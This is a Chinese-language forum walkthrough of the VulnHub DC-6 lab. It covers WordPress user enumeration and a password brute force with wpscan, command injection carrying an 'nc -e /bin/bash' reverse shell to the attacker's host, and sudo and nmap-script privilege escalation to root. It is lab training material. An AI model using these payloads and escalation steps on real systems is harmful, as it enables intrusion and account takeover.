电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 478 人浏览分享

vulnhub DC-6靶机实战

[复制链接]
478 0
0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-6,315/

QQ截图20221121102836.png

安装好并将网络置为NET模式

kali net模式

DC-6 net模式

QQ截图20221121103020.png

0X02 信息收集

1.主机发现

arpscan -l

QQ截图20221121103239.png

kali  192.168.190.128

DC-6  192.168.190.134

2.端口收集

nmap -sS 192.168.190.134

6999899898.png

发现存在80端口,可以进行查看,直接查看跳转到了http://wordy/

与DC-2问题类似需要修改自己本地的host文件

69989888.png

192.168.190.134 wordy

QQ截图20221121103843.png

访问成功

QQ截图20221121103919.png

3.目录扫描

python3 dirsearch.py -u http://192.168.190.134/

69888.png

成功找到后台登陆页面

http://wordy/wp-login.php

69886.png

4.查看网站配置

QQ截图20221121104532.png

wordpress cms

0X03 Getshell

1.漏洞发现

根据已知cms,可以进行搜索历史漏洞或者去登录到后台进行getshell

目前已知后台地址,可以进行爆破,爆破之前尝试弱口令:admin/admin 另一个账号采用admin1

6818.png

6816.png

经过测试,admin账户是存在的只不过密码不对,而admin1此账户不存在,所以两次回显页面不同
针对wordpress cms 可以利用kali自带的wpscan进行爆破密码
wpscan --url http://wordy -e u  # 爆破对应网站有多少个用户

6813.png

经过测试五个用户,将此五个用户写入到一个user.txt 文档中

admin  graham  sarah  mark  jens

6812.png

密码可以利用kali自带的密码文档

位置在/usr/share/wordlists/rockyou.txt.gz
cd /usr/share/wordlists
cp rockyou.txt /home/kali/rockyou.txt
ls

6811.png

再次利用wpscan进行爆破

wpscan --url http://wordy -P rockyou.txt -U user.txt

爆破出来一个用户的账号和密码,尝试登陆

mark/helpdesk01

登录成功

6810.png

经过检查找到一个可以利用的点

3128.png

2.漏洞利用

进行抓包测试

3126.png

可以看到可以执行命令,所以进行反弹shell

3.反弹shell

kali 开启监听

nc -lvnp 5678

在已经抓取的包中进行修改

qq.com|nc -e /bin/bash 192.168.190.128 5678

3319.png

进行交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

3318.png

0X04 提权

1.当前权限

whoami    # www-data

3316.png

首先查看mark用户下的文件
cd /home
ls
cd mark
ls
cd stuff
ls
cat things-to-do.txt

3312.png

3311.png

得到了另一个用户的账号密码

graham/GSo7isUM1D4

尝试登陆网站,结果登录失败

2298.png

端口扫描时,有个22端口可以尝试ssh登录

ssh graham@192.168.190.134

2288.png

2.常用提权

sudo -l

2286.png

出现jens免登录的提示

cd ..
cd jens
ls
cat backups.sh

2282.png

2281.png

3.漏洞提权

进行查看之后可以看到是有两条命令,可以再写入一个shell的命令

echo "/bin/bash" >> backups.sh

22.png

然后以管理员身份来运行

sudo -u jens ./backups.sh
sudo -l

21.png

20.png

可以看到jens又可以以管理员身份运行nmap,所以考虑到可以利用nmap进行提权
4.开始提权

写入一个shell的脚本文件,写入的命令由nmap来执行
echo 'os.execute("/bin/bash")' >> shell
nmap执行getshell的脚本命令
sudo nmap --script=shell

19.png

提权成功,切换到root目录下进行查看

cd root
ls
cat theflag.txt

18.png

0X05 总结

1.首先收集信息,真实ip,端口,网站目录,网站部署部件等
2.利用已知cms进行查找后台地址
3.利用wpscan进行爆破用户和密码
4.利用后台进行getshell
5.利用每个用户家目录下的文件进行达到最后的提权效果
6.提权成功查看flag

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.